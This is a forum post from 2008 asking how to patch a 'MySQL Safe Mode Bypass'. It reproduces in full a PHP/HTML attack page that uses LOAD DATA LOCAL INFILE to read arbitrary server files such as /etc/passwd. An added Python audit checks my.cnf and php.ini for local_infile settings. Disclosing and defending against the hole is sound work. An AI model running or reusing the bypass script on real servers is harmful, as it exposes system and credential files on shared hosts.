MySQL Forums

Mysql Bypass (MySQL Safe Mode Bypass Vulnerability)
Posted by: Masood Yarmohammadi
Date: January 04, 2008 09:55AM

A hacker can bypass our MySQL and view any hosted files on the server with the
following script:

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="Mysql Bypass,Ashiyane Digital Security
Team ,Sha2ow">
<meta name="description" content="Mysql Bypass - Ashiyane Digital
Security Team . Sha2ow">
<title>Mysql Bypass - Ashiyane Digital Security Team .</title>
</head>

<body text="#FFFFFF" bgcolor="#000000">


<p align="center">
<br>
<font face="Tahoma" style="font-size: 15pt; font-weight: 700">Ashiyane
Digital Security Team<br>
Mysql Bypass <br>
</font><font face="Tahoma" size="2">4.4.7 / 5.2.3 PHP ver -&nbsp; MySQL
Safe
Mode Bypass Vulnerability<br>
only ,
Create mysql database and add user for mysql database</font><font
face="Tahoma" style="font-size: 10pt; font-weight: 700"><br>
&nbsp;</font></p>
<div align="center">

<form method="post">

<table border="0" cellspacing="1" width="859" height="6%">
<tr>
<td width="311"><font face="Tahoma"><span style="font-size:
9pt">&nbsp;DataBase
Name : <input type="text" name="dbname" size="20">&nbsp;&nbsp;&nbsp;

</span></font></td>
<td width="240"><font face="Tahoma"><span style="font-size: 9pt">
Username :&nbsp; <input type="text" name="dbuser"
size="20">&nbsp;&nbsp;</span></font></td>
<td width="298"><font face="Tahoma"><span style="font-size:
9pt">&nbsp;Password
:&nbsp; <input type="text" name="dbpass"
size="20"></span></font></td>
</tr>
<tr>
<td width="311" valign="middle">
&nbsp;</td>
<td width="240" valign="middle">
&nbsp;</td>
<td width="298" valign="middle">
&nbsp;</td>
</tr>
<tr>
<td width="554" valign="middle" colspan="2">
<p align="left"><font face="Tahoma"><span style="font-size: 9pt">
File Path :&nbsp;&nbsp;
<input type="text" name="path1" size="45" style=" weight:200;
height:21; width:229" dir="ltr" value="/etc/passwd">&nbsp;<input
type="submit" value="Bypass" name="exec"></span></font></td>
<td width="298" valign="middle">
&nbsp;</td>
</tr>
<tr>
<td width="855" valign="middle" colspan="3">
<br>
<?
if(!empty($_POST['dbname']) && !empty($_POST['dbuser']) &&
!empty($_POST['dbpass']) && !empty($_POST['path1']))
{
$dbname = $_POST['dbname'];
$dbuser = $_POST['dbuser'];
$dbpass = $_POST['dbpass'];
$path1 = $_POST['path1'];
if(mysql_connect( "localhost", $dbuser, $dbpass ))
{
$drop= "DROP TABLE $dbname.`bypass`" ;
$query = "CREATE TABLE $dbname.`bypass` (`fileview` VARCHAR( 2048 ) NOT
NULL);";
mysql_query($drop);
mysql_query($query);
mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'" . " INTO TABLE " .
$dbname . ".bypass");
$result =mysql_db_query($dbname,"SELECT * FROM bypass ");
$numrows = mysql_num_rows($result);
?>

<textarea rows="15" name="result" cols="103">
<?
while($row = mysql_fetch_array($result)) {
echo $row[fileview] ;

}
}

}

?>
</textarea></td>

</tr>
</table>
</form>
</div>
<p align="center"><font face="Tahoma" size="2"
color="#FF0000">&nbsp;Ashiyane
Digital Security Team - Copyright Sha2ow.</font></p>


How can I patch this?

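The script in the post relies on `LOAD DATA LOCAL INFILE`, where the file is read by the MySQL client library inside the PHP process rather than by PHP's own file functions, which is how it sidesteps safe_mode. The following is an added example, not part of the original post: a Python audit that checks whether a my.cnf and a php.ini explicitly switch that feature off. The sample configs are constructed and the function names are hypothetical; `local_infile` (MySQL server) and `mysql.allow_local_infile` / `mysqli.allow_local_infile` (PHP) are the real settings.

```python
import re

# Constructed sample configs for the demo (not taken from the original post).
SAMPLE_MY_CNF = "[client]\nlocal-infile=1\n[mysqld]\ndatadir=/var/lib/mysql\nlocal-infile = ON\n"
SAMPLE_PHP_INI = "; sample\nsafe_mode = On\nopen_basedir = /home/site\n[MySQLi]\nmysqli.allow_local_infile = On\n"
HARDENED_MY_CNF = "[mysqld]\nlocal_infile = 0\n"
HARDENED_PHP_INI = "mysql.allow_local_infile = Off\nmysqli.allow_local_infile = Off\n"

ENABLED = {"1", "on", "true", "yes"}

def parse_ini(text):
    """Return {section: {key: value}}; keys before any section go under ''."""
    section, out = "", {"": {}}
    for raw in text.splitlines():
        line = re.split(r"[#;]", raw, maxsplit=1)[0].strip()  # drop comments
        if not line:
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            out.setdefault(section, {})
            continue
        key, sep, val = line.partition("=")
        # MySQL treats '-' and '_' in option names alike; a bare option means "on".
        key = key.strip().lower().replace("-", "_")
        out[section][key] = val.strip().strip('"').lower() if sep else "1"
    return out

def audit(my_cnf, php_ini):
    """Return findings; an empty list means LOCAL INFILE is explicitly off."""
    findings = []
    # Only [mysqld] counts: [client] values are chosen by the connecting side.
    server = parse_ini(my_cnf).get("mysqld", {})
    val = "0" if "skip_local_infile" in server else server.get("local_infile")
    if val is None:
        findings.append("my.cnf [mysqld]: local_infile not set (default varies by version)")
    elif val in ENABLED:
        findings.append("my.cnf [mysqld]: local_infile is enabled")
    # php.ini directives are global, so section headers are ignored.
    php = {k: v for sec in parse_ini(php_ini).values() for k, v in sec.items()}
    for key in ("mysql.allow_local_infile", "mysqli.allow_local_infile"):
        if key not in php:
            findings.append(f"php.ini: {key} not set (default varies by version)")
        elif php[key] in ENABLED:
            findings.append(f"php.ini: {key} is enabled")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_MY_CNF, SAMPLE_PHP_INI):
        print("FINDING:", finding)
    print("hardened:", audit(HARDENED_MY_CNF, HARDENED_PHP_INI))
```

Disabling `local_infile` on the server makes it reject `LOAD DATA LOCAL` from every client, which matters on shared hosting where tenants control their own PHP code.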